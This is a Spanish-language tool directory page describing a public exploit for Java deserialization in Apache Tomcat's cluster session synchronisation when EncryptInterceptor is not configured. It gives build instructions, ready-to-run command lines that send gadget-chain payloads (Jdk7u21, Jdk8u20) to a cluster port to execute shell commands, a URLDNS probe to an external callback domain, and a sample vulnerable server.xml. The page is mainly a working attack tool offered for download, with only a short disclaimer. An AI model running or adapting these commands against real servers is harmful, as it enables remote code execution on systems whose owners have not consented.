Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
tomcat-cluster-session-sync-exp — Cuando Tomcat utiliza su función de sincronización de sesiones incorporada, una configuración insegura (sin usar EncryptInterceptor) provoca una vulnerabilidad de deserialización. Mediante paquetes de datos cuidadosamente construidos, se puede atacar a los servidores que usan la función de sincronización de sesiones incorporada de Tomcat. PD: esto no es CVE-2020-9484; 9484 es la vulnerabilidad de persistencia de sesiones, ¡esta es la vulnerabilidad de sincronización del clúster de sesiones! | Kitploit
Herramientas/GitHubGitHub/threedr3am/tomcat-cluster-session-sync-exp
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubthreedr3am/tomcat-cluster-session-sync-exp

tomcat-cluster-session-sync-exp

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

21437hace 6 añosRevisado por Kitploit

Cuando Tomcat utiliza su función de sincronización de sesiones incorporada, una configuración insegura (sin usar EncryptInterceptor) provoca una vulnerabilidad de deserialización. Mediante paquetes de datos cuidadosamente construidos, se puede atacar a los servidores que usan la función de sincronización de sesiones incorporada de Tomcat. PD: esto no es CVE-2020-9484; 9484 es la vulnerabilidad de persistencia de sesiones, ¡esta es la vulnerabilidad de sincronización del clúster de sesiones!

Compartir

La herramienta se utiliza únicamente para investigación de seguridad y autoevaluación interna. Está prohibido usarla para lanzar ataques ilegales; el usuario es responsable de las consecuencias.

Exploit de sincronización de sesiones del clúster de Tomcat

Este es un exploit de deserialización causado por una configuración insegura (sin usar EncryptInterceptor) cuando Tomcat utiliza su función de sincronización de sesiones incorporada. Mediante paquetes de datos cuidadosamente construidos, se puede atacar a servidores que usan la función de sincronización de sesiones incorporada de Tomcat.

Uso

Primero compile el archivo jar:

root@kitploit:~
mvn clean compile assembly:assembly

El archivo jar generado se encuentra en el directorio target.

Uso, por ejemplo:

root@kitploit:~
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 Jdk7u21 "/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 Jdk8u20 "/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 URLDNS "http://tomcat.xxxxx.ceye.io"

Requisitos

  1. Tomcat tiene habilitada la sincronización de sesiones, sin configurar EncryptInterceptor
  2. La versión de JDK es inferior a jdk8u20, jdk7u21 (no sé si es correcto)
  3. El endpoint de sincronización es accesible (generalmente en la red interna)

Configuración de sincronización de sesiones de Tomcat

(conf/server.xml):

root@kitploit:~
<Server>
    ...
    
    <Service>
        ...
        
        <Engine>
            ...
            
            <Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"
                    channelSendOptions="6">
            
                    <Manager className="org.apache.catalina.ha.session.BackupManager"
                      expireSessionsOnShutdown="false"
                      notifyListenersOnReplication="true"
                      mapSendOptions="6"/>
            
            
                    <Channel className="org.apache.catalina.tribes.group.GroupChannel">
                      <Membership className="org.apache.catalina.tribes.membership.McastService"
                        address="228.0.0.4"
                        port="45564"
                        frequency="500"
                        dropTime="3000"/>
                      <Receiver className="org.apache.catalina.tribes.transport.nio.NioReceiver"
                        address="123.123.123.123"
                        port="5000"
                        selectorTimeout="100"
                        maxThreads="6"/>
            
                      <Sender className="org.apache.catalina.tribes.transport.ReplicationTransmitter">
                        <Transport className="org.apache.catalina.tribes.transport.nio.PooledParallelSender"/>
                      </Sender>
                    </Channel>
            
                    <Valve className="org.apache.catalina.ha.tcp.ReplicationValve"
                      filter=".*\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/>
            
                    <Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer"
                      tempDir="/tmp/war-temp/"
                      deployDir="/tmp/war-deploy/"
                      watchDir="/tmp/war-listen/"
                      watchEnabled="false"/>
            
                    <ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/>
            </Cluster>
        </Engine>
  </Service>
</Server>
Descargar herramienta